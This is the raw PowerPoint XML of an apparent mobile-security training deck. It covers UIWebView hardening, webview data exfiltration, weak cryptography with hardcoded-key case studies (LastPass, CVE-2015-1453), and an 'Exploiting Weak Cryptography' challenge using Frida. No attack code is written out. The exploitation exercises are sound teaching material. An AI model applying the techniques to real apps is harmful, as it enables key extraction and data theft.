            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>In case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>UIWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>necessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>recommended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="120000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </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void</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loadRequest</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NSURLRequest</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request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>for local files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="120000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>Use </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void</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loadRequest</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NSString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *)string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>baseURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:(NSURL *)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>baseURL</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t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> a URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> as follow </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URLWithString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:@"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="16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dirty="0" err="1"/>
              <a:t>Webviews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> and Data Exfiltration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8468B5D4-D4E1-4AED-B7B5-C5DFD094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001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a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>bounty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58370" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.20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1974850"/>
            <a:ext cx="965200" cy="96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4994009"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3377247" y="32831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 $ 1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" baseline="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>20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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0116985-278D-480C-9542-40F282BF7955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2742654431"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5655627" y="5607235"/>
          <a:ext cx="3266159" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3266159">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Total : $ 4410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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128935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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>You can use a preconfigured emulator : Application &gt; Android Zone &gt; Android CLI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>And run the following command from the terminal :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="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Configuration</a:t>
            </a:r>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30EA9C-AB05-3C59-1EFB-5203523FA4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346859" y="3155622"/>
            <a:ext cx="2390398" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="914400">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="200000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; start-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>emulator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0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91019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255588" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>dealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> mobile apps :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Hardecoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>outdated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> (or home made) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>algorithmq</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>generator</a:t>
            </a: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Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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6028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Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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nnouncing Secrets Management for Terraform - Secre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871662"/>
            <a:ext cx="4095750"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734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55588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example 1 : Hardcoded Master Key in LastPass Password Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://team-sik.org/sik-2016-022/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.apkhere.com/down/com.lastpass.lpandroid_4.0.52_free</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example 2 : CVE-2015-1453 -  FortiClient Android - Hardcoded Encryption Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/cve/CVE-2015-1453/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://apkpure.com/forticlient-vpn/com.fortinet.forticlient_vpn/download/502080127-APK</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2"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pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Study</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hardcoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Fichier:Android logo 2019 (stacked).svg — Wikipé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296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lgn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to check if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>enough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> ... Anyway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> help us ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Android Cryptographic APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>/OWASP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>owasp-mstg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>/blob/master/Document/0x05e-Testing-Cryptography.md</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>How Secure is your Android Keystore Authentication ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>labs.f-secure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>/blog/how-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>is-your-android-keystore-authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>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7 : Exploiting Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>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dirty="0" err="1"/>
              <a:t>Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805734" y="5413338"/>
            <a:ext cx="924164" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Frida</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505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>NA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCFD52FC-3AED-DEB1-0BB8-66AAB0C38BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2910" t="4658" r="50004" b="64471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="5839405"/>
            <a:ext cx="1088231" cy="535781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2515466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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
